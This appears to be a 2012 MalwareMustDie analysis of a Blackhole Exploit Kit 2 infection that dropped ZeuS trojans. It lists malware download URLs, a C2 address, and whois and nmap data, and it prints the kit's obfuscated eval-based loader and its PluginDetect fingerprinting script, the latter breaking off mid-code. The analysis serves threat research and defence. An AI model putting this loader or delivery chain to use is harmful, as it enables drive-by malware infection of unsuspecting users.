MalwareMustDie

#w00t! Large Infection BHEK2 Dropped Multiple Trojan/ZeuS!

Oct 27th, 2012
=====================================================
#MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #

This is the large infection of BHEK2 hinted by @xxxxrxero and followed up by @unixfreaxjp.
Hit by MDAC exploit infection & downloaded the Trojan / Backdoor / Encrypt / Downloader '03ab326.exe' saved [256784/256784]
I am pretty sure this one is ZeuS, since the VT detection ratio is still too low.
url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
Also drops another troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
Referer is: 74.200.211.205
CNC: 198.143.159.66
After infection by 03ab326.exe it also downloaded THREE MORE TROJANS from:
h00p://springbackcolorado.com/CaBPXFg.exe
h00p://180degrees.org.nz/cXbAC.exe
h00p://weareseasons.com/7yoZf5.exe
PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
======================================================

========================
INFECTIONS SCHEME
========================

#include Hint: HINT.TXT;
---------------------------------------------------------------------------------------------------------------------------...
LANDING PAGE | JS.JS | PLUGIN DETECT OBFS
---------------------------------------------------------------------------------------------------------------------------...
[41 rows of landing page | js.js | plugin-detect URL triples omitted]


==================================
INFECTOR DETAILS;

74.200.211.205
==================================
NetRange: 74.200.192.0 - 74.200.255.255
CIDR: 74.200.192.0/18
OriginAS: AS16805, AS22576
NetName: LAYERED-TECH-CHI
NetHandle: NET-74-200-192-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-11-14
Updated: 2012-02-24
Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1


OrgName: Layered Technologies, Inc.
OrgId: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
RegDate: 2004-07-21
Updated: 2010-08-13
Comment: Please send all abuse complaints to abuse@layeredtech.com
Ref: h00p://whois.arin.net/rest/org/LAYER-3

PORT     STATE   SERVICE
21/tcp   open    ftp
25/tcp   open    smtp
26/tcp   closed  unknown
53/tcp   open    domain
80/tcp   open    h00p
110/tcp  open    pop3
143/tcp  closed  imap
443/tcp  open    h00ps
587/tcp  open    submission
993/tcp  closed  imaps
995/tcp  closed  pop3s
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
TSeq(Class=TR%IPID=I%TS=0)
T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)

==================================
CNC / CONTROL DETAILS;

IP: 198.143.159.66
==================================

NetRange: 198.143.128.0 - 198.143.191.255
CIDR: 198.143.128.0/18
OriginAS: AS32475
NetName: SINGLEHOP
NetHandle: NET-198-143-128-0-1
Parent: NET-198-0-0-0-0
NetType: Direct Allocation
RegDate: 2012-05-16
Updated: 2012-05-16
Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1


OrgName: SingleHop, Inc.
OrgId: SINGL-8
Address: 621 W. Randolph St.
Address: 3rd Floor
City: Chicago
StateProv: IL
PostalCode: 60661
Country: US
RegDate: 2007-03-07
Updated: 2010-03-23
Comment: h00p://www.singlehop.com/
Ref: h00p://whois.arin.net/rest/org/SINGL-8


PORT     STATE     SERVICE
22/tcp   open      ssh
80/tcp   open      h00p
135/tcp  filtered  msrpc
136/tcp  filtered  profile
137/tcp  filtered  netbios-ns
138/tcp  filtered  netbios-dgm
139/tcp  filtered  netbios-ssn
445/tcp  filtered  microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


============================================
Grab the pluginDetect & you get the CNC!
============================================
$ myfetch --h00p_proxy=yes \
  --user-agent="Mozila/4.3(X11; U; MacOSX)" \
  --cookies=on --keep-session-cookies --save-cookies mycookies.txt \
  --referer="h00p://74.200.211.205/SQeyUUzT/js.js" \
  --target="h00p://ser.luckypetspetsitting.com/links/return-west.php"

// w/ Tor
--16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 502 Bad Gateway
16:21:14 ERROR 502: Bad Gateway.

// gatling IP
--16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Resolving ser.luckypetspetsitting.com... 198.143.159.66
Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: unspecified [text/html]
16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]

============================
DECODING ANALYSIS
============================

// Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK

<html><head><title></title></head><body><div dqa="asd"></div>
<script>
p=eval("p"+"arseInt");
function asd(){return document.getElementsByTagName("span")[0];}
function asd2(){return q.getAttribute(i);}
function asd3(){a+=String.fromCharCode(p(s.substr(i,2),24));}
function asd4(){eval(a);}
zxc=(020==0x10);
</script>
<span ...></span>
[the span's numerically named attributes carrying the base-24 encoded payload are omitted here; the blob is also truncated in the original paste]
38="e421m4c@454e474k48&2e201e1e43+1m494j2m4l%4e431g423j)203l1h1h1h#1h53411m4g*4l4j481g42!1h55551k43^414c4c2h4i_4i41512a46$4l4e434k49(4f4e1g421h@534m414i18&432d4k4849+4j1k412b49%461g431m49)4j2h4i4i41#511g421h1h*53464f4i1g!412d202b41^2c421m4c45_4e474k482b$411j1j1h53(49461g423j@413l2d2d2d&4e4l4c4c1h+534i45" 20="422d1n&3m3j3k1c3l+3j3k1c3l1n%1k432d4k48)494j2b464f#4i1g411849*4e18461h53!49461g421m^4k454j4k1g_411h1h534k$4i5153472d(411m4j4c49@43451g221h&2b49461g47+1m4c454e47%4k482e201e)1e19463j47#3l1h53463j*473l2d463j!413l1g461h^2b44454c45_4k4518463j$413l555543(414k43481g@441h535555&55551k494e+494k37424a%2a464l4" 67="452d1a1f(1j483j4f3l@1j1f1a184m&414c4l452d+1a1f1j483j%4f1j213l1j)1f1a181n2e#1f55554h1j*2d411j461j!1a1n1a1j47^1j1a2e1a55_454c4j4553$4h2d415549(461g194b1m@44494m1h53&4a2d4e1m47+454k2l4c45%4d454e4k2i)5131441g4b#1m44494m31*2k1h2b4946!1g4a1h534b^1m44494m2d_4a55454c4j$45534b1m44(494m2d4e1m@434i45414k&452l4" 74="l21212j2m$1l2h22242k(1l24242425@2523252420&2020201a1k+31363b3c2h%34342l2k2a)53551k4g4c#4l47494e30*414j35494d!453c514g45^2a464l4e43_4k494f4e1g$441k431k46(1h534m414i@18422d4k48&494j1k452d+421m1c1k41%2b464f4i1g)4118494e18#441h534946*1g443j413l!1e1e443j41^3l1m4k514g_451e1e443j$413l1m4k51(4g452d2d43@1h53" 73="h*55551k384c!4l47494e4j^2a5341444f_42454i4541$44454i2a53(4d494d453c@514g452a1a&414g4g4c49+43414k494f%4e1n4g4446)1a1k4e414m#384c4l4749*4e37424a2a!4e4l4c4c1k^4g4i4f4731_2k2a3j1a2h$434i4f382k(2m1m382k2m@1a1k1a382k&2m1m384446+2j4k4i4c1a%3l1k434c41)4j4j312k2a#1a434c4j49*442a2j2h28!2h29272820^1l2228202k_1" 54="e18)1l21551k47#454k3c4147*3b4k414k4l!4j2a464l4e^434k494f4e_1g4d1k471k$411k421h53(4m414i1843@2d4k48494j&1k461k4b2d+4d1m4j4g41%4e1k4c2d43)1m47454k3f#49444k481g*4b1h1k482d!411m4j4g41^4e1k4a2d43_1m47454k3f$49444k481g(481h1k442d@471m4j4g41&4e1k492d43+1m47454k3f%49444k481g)441h2b4946#1g194b5454*1948545419" 
59="1j221h534k_4i5153463j$473j413l3l(2d473j411j@213l554341&4k43481g44+1h53555555%551k494e4j)454i4k2k49#4m314e2i4f*44512a464l!4e434k494f^4e1g411k49_1h534m414i$18481k462d(4k48494j1k@422d1a4g44&2323292923+2329291a1k%442d4e4l4c)4c1k4a2d49#2f4n494e44*4f4n1m4k4f!4g1m444f43^4l4d454e4k_2a4n494e44$4f4n1m444f(434" 92="1h53555543_414k43481g$451h535555(43414k4348@1g454i4i4e&4f1h535544+4f434l4d45%4e4k1m4n4i)494k451g1f#1f1h2b4j45*4k3c494d45!4f4l4k1g45^4e443n4i45_44494i4543$4k1k262020(20201h2b" 76="51k)411k432b49#461g441m49*4j3b4k4i49!4e471g4a1h^1h534a2d4a_1m4i454g4c$4143451g1n(3k4j1n471k@1a1a1h2b49&461g4a1h53+4b2d4a5555%454c4j4553)4a2d4e4l4c#4c5549461g*441m494j2k!4546494e45^441g471m31_363b3c2h34$342l2k3j4b(3l1h1h5347@1m494e4j4k&414c4c4544+2d471m3136%3b3c2h3434)2l2k3j4b3l#2b4i454k4l*4i4e554946" 88="!4k4k4i4942^4l4k451g1a_49441a1k4i$41231h2b4i(41231m4j45@4k2h4k4k4i&49424l4k45+1g1a434c41%4j4j49441a)1k1a434c4j#49442a2i2k*29262j2525!261l26252h^231l21212k_201l292823$2h1l20202j(20242m2j22@292l23261a&1h2b4k4i51+534m414i18%4i41202d4i)41231m2j4i#45414k4537*424a45434k!1g1a41444f^441a1m434f_4e43414k1g$1a" 2="22d2d+1a464l4e43%4k494f4e1a)551k494j3b#4k4i494e47*2a464l4e43!4k494f4e1g^421h534i45_4k4l4i4e18$4k514g454f(4618422d2d@1a4j4k4i49&4e471a551k+494j364l4d%2a464l4e43)4k494f4e1g#421h534i45*4k4l4i4e18!4k514g454f^4618422d2d_1a4e4l4d42$454i1a551k(494j3b4k4i@364l4d2a46&4l4e434k49+4f4e1g421h%534i454k4l)4i4e1g4k" 72="4c44%1g4g1h5543)414k43481g#4d1h53552b*4i454k4l4i!4e534j4g41^4e2a4g1k4n_494e344f41$4445442a4b(1m4n494e34@4f41444544&1k4k414736+414d452a47%1k4f4l4k45)4i303c3534#2a4h55554i*454k4l4i4e!534j4g414e^2a4e4l4c4c_1k4n494e34$4f41444544(2a4b1m4n49@4e344f4144&45441k4k41+4736414d45%2a1a1a1k4f)4l4k454i30#3c35342a4" 
18="l*4d3a454750!1h2b464f4i^1g412d202b_412c441m4c$454e474k48(2b411j1j1h@5349461g43&2e1l211e1e+412e431e1e%443j413l19)2d1a201a1h#534i454k4l*4i4e184255!49461g473j^413l192d44_3j413l1h53$49461g432d(2d1l211h53@432d415549&461g443j41+3l192d1a20%1a1h534i45)4k4l4i4e18#425555554i*454k4l4i4e!1845551k2h^3g372a4n49_4" 63="k4a1k462d$1a2c1a2b4m(414i18432d@3j1a4f4l4k&4c494e453b+4k514c451a%1k1a4e4f4e)451a1k1a42#4f4i44454i*3b4k514c45!1a1k1a4e4f^4e451a1k1a_4g41444449$4e471a1k1a(204g501a1k@1a4d414i47&494e1a1k1a+204g501a1k%1a4m494j49)42494c494k#511a1k1a4m*494j49424c!451a3l2b4m^414i18492d_1a4f4l4k4c$494e451l4j(4k514c452a@4e4f" 9="1g201k&241h1m4a4f+494e1g1a1k%1a1h551k1c)1c48414j35#494d453c51*4g452a464l!4e434k494f^4e1g411h53_4i454k4l4i$4e18464l4e(434k494f4e@1g431h5349&461g19411m+494j312l1e%1e431h534m)414i18461k#451k421k44*2d411m494j!2h4i4i4151^1g431h2f43_2a1g411m49$4j3b4k4i49(4e471g431h@2f3j433l2a&3j3l1h2b46+4f4i1g422d%202b422" 14="41#3j463l5555*554i454k4l!4i4e184e4l^4c4c551k47_454k35494d$452l4e4142(4c4544384c@4l47494e2a&464l4e434k+494f4e1g4b%1k4d1k431h)534m414i18#452d4k4849*4j1k461k42!2d4e454n18^3a45472l50_4g1g4d1k1a$491a1h1k48(2d1a1a1k47@2d432f4e45&4n183a4547+2l504g1g43%1k1a491a1h)2a201k411k#4c1k441k4a*2d451m494j!3b4k4i494e^"></span><script>
  216. if(zxc){var q=asd();
  217. var s="",a="";
  218. for(i=0;i<93;i++){
  219. s+=asd2();
  220. }
  221. s=s.replace(/[^a-z0-9]+/g,"");
  222. for(i=0;i<s.length;i+=2){
  223. window.asd3();
  224. }
  225. try{window.document.body=s}catch(awt){asd4()}}
  226. </script></body></html>
  227.  
  228. ---------------------------------------------------------------------------------------
  229.  
  230. // BHEK2 Plugin Detect.....these morons never learn...
  231. // I won't spend my time on PDF and jar; I aimed straight at the PE infectors..
  232. // You guys can go ahead with jar and PDF
  233. // rgds, @unixfreaxjp
  234.  
  235. try {
  236. var PluginDetect = {
  237. version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
  238. return function (){
  239. c(b, a)
  240. }
  241. }
  242. , isDefined : function (b){
  243. return typeof b != "undefined"
  244. }
  245. , isArray : function (b){
  246. return (/array/i).test(Object.prototype.toString.call(b))
  247. }
  248. , isFunc : function (b){
  249. return typeof b == "function"
  250. }
  251. , isString : function (b){
  252. return typeof b == "string"
  253. }
  254. , isNum : function (b){
  255. return typeof b == "number"
  256. }
  257. , isStrNum : function (b){
  258. return (typeof b == "string" && (/\d/).test(b))
  259. }
  260. , getNumRegx : /[\d][\d\.\_,-]*/, splitNumRegx : /[\.\_,-]/g,
  261. getNum : function (b, c){
  262. var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
  263. exec(b) : null;
  264. return a ? a[0] : null
  265. }
  266. , compareNums : function (h, f, d){
  267. var e = this , c, b, a, g = parseInt;
  268. if (e.isStrNum(h) && e.isStrNum(f)){
  269. if (e.isDefined(d) && d.compareNums){
  270. return d.compareNums(h, f)
  271. }
  272. c = h.split(e.splitNumRegx);
  273. b = f.split(e.splitNumRegx);
  274. for (a = 0; a < Math.min(c.length, b.length);
  275. a ++ ){
  276. if (g(c[a], 10) > g(b[a], 10)){
  277. return 1
  278. }
  279. if (g(c[a], 10) < g(b[a], 10)){
  280. return - 1
  281. }
  282. }
  283. }
  284. return 0
  285. }
  286. , formatNum : function (b, c){
  287. var d = this , a, e;
  288. if (!d.isStrNum(b)){
  289. return null
  290. }
  291. if (!d.isNum(c)){
  292. c = 4
  293. }
  294. c--;
  295. e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  296. for (a = 0; a < 4; a ++ ){
  297. if (/^(0+)(.+)$/.test(e[a])){
  298. e[a] = RegExp.$2
  299. }
  300. if (a > c ||! (/\d/).test(e[a])){
  301. e[a] = "0"
  302. }
  303. }
  304. return e.slice(0, 4).join(",")
  305. }
  306. , $$hasMimeType : function (a){
  307. return function (c){
  308. if (!a.isIE && c){
  309. var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
  310. for (b = 0; b < d.length; b ++ ){
  311. if (a.isString(d[b]) && /[^\s]/.test(d[b])){
  312. f = navigator.mimeTypes[d[b]];
  313. e = f ? f.enabledPlugin : 0;
  314. if (e && (e.name || e.description)){
  315. return f
  316. }
  317. }
  318. }
  319. }
  320. return null
  321. }
  322. }
  323. , findNavPlugin : function (l, e, c){
  324. var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
  325. new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
  326. for (f = 0; f < a.length; f ++ ){
  327. m = a[f].description || g;
  328. b = a[f].name || g;
  329. if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
  330. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
  331. if (!k ||! (k.test(m) || k.test(b))){
  332. return a[f]
  333. }
  334. }
  335. }
  336. return null
  337. }
  338. , getMimeEnabledPlugin : function (k, m, c){
  339. var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
  340. l, d, j = e.isString(k) ? [k] : k;
  341. for (d = 0; d < j.length; d ++ ){
  342. if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
  343. l = f.description || h;
  344. a = f.name || h;
  345. if (b.test(l) || b.test(a)){
  346. if (!g ||! (g.test(l) || g.test(a))){
  347. return f
  348. }
  349. }
  350. }
  351. }
  352. return 0
  353. }
  354. , getPluginFileVersion : function (f, b){
  355. var h = this , e, d, g, a, c =- 1;
  356. if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
  357. return b
  358. }
  359. if (!b){
  360. return e
  361. }
  362. e = h.formatNum(e);
  363. b = h.formatNum(b);
  364. d = b.split(h.splitNumRegx);
  365. g = e.split(h.splitNumRegx);
  366. for (a = 0; a < d.length; a ++ ){
  367. if (c >- 1 && a > c && d[a] != "0"){
  368. return b
  369. }
  370. if (g[a] != d[a]){
  371. if (c ==- 1){
  372. c = a
  373. }
  374. if (d[a] != "0"){
  375. return b
  376. }
  377. }
  378. }
  379. return e
  380. }
  381. , AXO : window.ActiveXObject, getAXO : function (a){
  382. var f = null, d, b = this , c = {
  383. }
  384. ;
  385. try {
  386. f = new b.AXO(a)
  387. }
  388. catch (d){
  389. }
  390. return f
  391. }
  392. , convertFuncs : function (f){
  393. var a, g, d, b = /^[\$][\$]/, c = this ;
  394. for (a in f){
  395. if (b.test(a)){
  396. try {
  397. g = a.slice(2);
  398. if (g.length > 0 &&! f[g]){
  399. f[g] = f[a](f);
  400. delete f[a]
  401. }
  402. }
  403. catch (d){
  404. }
  405. }
  406. }
  407. }
  408. , initObj : function (e, b, d){
  409. var a, c;
  410. if (e){
  411. if (e[b[0]] == 1 || d){
  412. for (a = 0; a < b.length; a = a + 2){
  413. e[b[a]] = b[a + 1]
  414. }
  415. }
  416. for (a in e){
  417. c = e[a];
  418. if (c && c[b[0]] == 1){
  419. this .initObj(c, b)
  420. }
  421. }
  422. }
  423. }
  424. , initScript : function (){
  425. var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
  426. b = a.platform || "", h = a.product || "";
  427. c.initObj(c, ["$", c]);
  428. for (f in c.Plugins){
  429. if (c.Plugins[f]){
  430. c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
  431. }
  432. }
  433. ;
  434. c.OS = 100;
  435. if (b){
  436. var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
  437. 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  438. , 100];
  439. for (f = d.length - 2; f >= 0; f = f - 2){
  440. if (d[f] && new RegExp(d[f], "i").test(b)){
  441. c.OS = d[f + 1];
  442. break
  443. }
  444. }
  445. }
  446. c.convertFuncs(c);
  447. c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
  448. "body")[0] || document.body || null);
  449. c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
  450. c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
  451. null ;
  452. c.ActiveXEnabled = false;
  453. if (c.isIE){
  454. var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  455. "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  456. "Scripting.Dictionary", "wmplayer.ocx"];
  457. for (f = 0; f < j.length; f ++ ){
  458. if (c.getAXO(j[f])){
  459. c.ActiveXEnabled = true;
  460. break
  461. }
  462. }
  463. }
  464. c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
  465. c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
  466. "0.9") : null;
  467. c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
  468. c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
  469. c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
  470. /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
  471. c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
  472. RegExp.$1) : null;
  473. c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
  474. c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
  475. parseFloat(RegExp.$1, 10) : null;
  476. c.addWinEvent("load", c.handler(c.runWLfuncs, c))
  477. }
  478. , init : function (d){
  479. var c = this , b, d, a = {
  480. status :- 3, plugin : 0
  481. }
  482. ;
  483. if (!c.isString(d)){
  484. return a
  485. }
  486. if (d.length == 1){
  487. c.getVersionDelimiter = d;
  488. return a
  489. }
  490. d = d.toLowerCase().replace(/\s/g, "");
  491. b = c.Plugins[d];
  492. if (!b ||! b.getVersion){
  493. return a
  494. }
  495. a.plugin = b;
  496. if (!c.isDefined(b.installed)){
  497. b.installed = null;
  498. b.version = null;
  499. b.version0 = null;
  500. b.getVersionDone = null;
  501. b.pluginName = d
  502. }
  503. c.garbage = false;
  504. if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
  505. a.status =- 2;
  506. return a
  507. }
  508. a.status = 1;
  509. return a
  510. }
  511. , fPush : function (b, a){
  512. var c = this ;
  513. if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
  514. ])))){
  515. a.push(b)
  516. }
  517. }
  518. , callArray : function (b){
  519. var c = this , a;
  520. if (c.isArray(b)){
  521. for (a = 0; a < b.length; a ++ ){
  522. if (b[a] === null){
  523. return
  524. }
  525. c.call(b[a]);
  526. b[a] = null
  527. }
  528. }
  529. }
  530. , call : function (c){
  531. var b = this , a = b.isArray(c) ? c.length :- 1;
  532. if (a > 0 && b.isFunc(c[0])){
  533. c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  534. }
  535. else {
  536. if (b.isFunc(c)){
  537. c(b)
  538. }
  539. }
  540. }
  541. , getVersionDelimiter : ",", $$getVersion : function (a){
  542. return function (g, d, c){
  543. var e = a.init(g), f, b, h = {
  544. }
  545. ;
  546. if (e.status < 0){
  547. return null
  548. }
  549. ;
  550. f = e.plugin;
  551. if (f.getVersionDone != 1){
  552. f.getVersion(null, d, c);
  553. if (f.getVersionDone === null){
  554. f.getVersionDone = 1
  555. }
  556. }
  557. a.cleanup();
  558. b = (f.version || f.version0);
  559. b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  560. return b
  561. }
  562. }
  563. , cleanup : function (){
  564. }
  565. , addWinEvent : function (d, c){
  566. var e = this , a = window, b;
  567. if (e.isFunc(c)){
  568. if (a.addEventListener){
  569. a.addEventListener(d, c, false)
  570. }
  571. else {
  572. if (a.attachEvent){
  573. a.attachEvent("on" + d, c)
  574. }
  575. else {
  576. b = a["on" + d];
  577. a["on" + d] = e.winHandler(c, b)
  578. }
  579. }
  580. }
  581. }
  582. , winHandler : function (d, c){
  583. return function (){
  584. d();
  585. if (typeof c == "function"){
  586. c()
  587. }
  588. }
  589. }
  590. , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
  591. var b = {
  592. }
  593. ;
  594. a.winLoaded = true;
  595. a.callArray(a.WLfuncs0);
  596. a.callArray(a.WLfuncs);
  597. if (a.onDoneEmptyDiv){
  598. a.onDoneEmptyDiv()
  599. }
  600. }
  601. , winLoaded : false, $$onWindowLoaded : function (a){
  602. return function (b){
  603. if (a.winLoaded){
  604. a.call(b)
  605. }
  606. else {
  607. a.fPush(b, a.WLfuncs)
  608. }
  609. }
  610. }
  611. , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
  612. function (){
  613. var d = this , b, h, c, a, f, g;
  614. if (d.div && d.div.childNodes){
  615. for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
  616. c = d.div.childNodes[b];
  617. if (c && c.childNodes){
  618. for (h = c.childNodes.length - 1; h >= 0; h -- ){
  619. g = c.childNodes[h];
  620. try {
  621. c.removeChild(g)
  622. }
  623. catch (f){
  624. }
  625. }
  626. }
  627. if (c){
  628. try {
  629. d.div.removeChild(c)
  630. }
  631. catch (f){
  632. }
  633. }
  634. }
  635. }
  636. if (!d.div){
  637. a = document.getElementById(d.divID);
  638. if (a){
  639. d.div = a
  640. }
  641. }
  642. if (d.div && d.div.parentNode){
  643. try {
  644. d.div.parentNode.removeChild(d.div)
  645. }
  646. catch (f){
  647. }
  648. d.div = null
  649. }
  650. }
  651. , DONEfuncs : [], onDoneEmptyDiv : function (){
  652. var c = this , a, b;
  653. if (!c.winLoaded){
  654. return
  655. }
  656. if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
  657. return
  658. }
  659. for (a in c){
  660. b = c[a];
  661. if (b && b.funcs){
  662. if (b.OTF == 3){
  663. return
  664. }
  665. if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
  666. return
  667. }
  668. }
  669. }
  670. for (a = 0; a < c.DONEfuncs.length; a ++ ){
  671. c.callArray(c.DONEfuncs)
  672. }
  673. c.emptyDiv()
  674. }
  675. , getWidth : function (c){
  676. if (c){
  677. var a = c.scrollWidth || c.offsetWidth, b = this ;
  678. if (b.isNum(a)){
  679. return a
  680. }
  681. }
  682. return - 1
  683. }
  684. , getTagStatus : function (m, g, a, b){
  685. var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
  686. g.span, i = c.getWidth(d);
  687. if (!k ||! h ||! d ||! c.getDOMobj(m)){
  688. return - 2
  689. }
  690. if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
  691. return 0
  692. }
  693. if (l >= i){
  694. return - 1
  695. }
  696. try {
  697. if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
  698. if (!m.winLoaded && c.winLoaded){
  699. return 1
  700. }
  701. if (m.winLoaded && c.isNum(b)){
  702. if (!c.isNum(m.count)){
  703. m.count = b
  704. }
  705. if (b - m.count >= 10){
  706. return 1
  707. }
  708. }
  709. }
  710. }
  711. catch (f){
  712. }
  713. return 0
  714. }
  715. , getDOMobj : function (g, a){
  716. var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
  717. try {
  718. if (b && a){
  719. d.div.focus()
  720. }
  721. }
  722. catch (f){
  723. }
  724. return b ? c.firstChild : null
  725. }
  726. , setStyle : function (b, g){
  727. var f = b.style, a, d, c = this ;
  728. if (f && g){
  729. for (a = 0; a < g.length; a = a + 2){
  730. try {
  731. f[g[a]] = g[a + 1]
  732. }
  733. catch (d){
  734. }
  735. }
  736. }
  737. }
  738. , insertDivInBody : function (a, i){
  739. var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
  740. document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
  741. if (!g){
  742. try {
  743. j.write(c + 'div id="' + b + '">o' + c + "/div>");
  744. d = j.getElementById(b)
  745. }
  746. catch (h){
  747. }
  748. }
  749. g = (j.getElementsByTagName("body")[0] || j.body);
  750. if (g){
  751. if (g.firstChild && f.isDefined(g.insertBefore)){
  752. g.insertBefore(a, g.firstChild)
  753. }
  754. else {
  755. g.appendChild(a)
  756. }
  757. if (d){
  758. g.removeChild(d)
  759. }
  760. }
  761. else {
  762. }
  763. }
  764. , insertHTML : function (g, b, h, a, l){
  765. var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
  766. var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
  767. "0px", "visibility", "visible"];
  768. var i =
  769. "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
  770. if (!k.isDefined(a)){
  771. a = ""
  772. }
  773. if (k.isString(g) && (/[^\s]/).test(g)){
  774. g = g.toLowerCase().replace(/\s/g, "");
  775. q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
  776. q += 'style="' + i + 'display:inline;" ';
  777. for (o = 0; o < b.length; o = o + 2){
  778. if (/[^\s]/.test(b[o + 1])){
  779. q += b[o] + '="' + b[o + 1] + '" '
  780. }
  781. }
  782. q += ">";
  783. for (o = 0; o < h.length; o = o + 2){
  784. if (/[^\s]/.test(h[o + 1])){
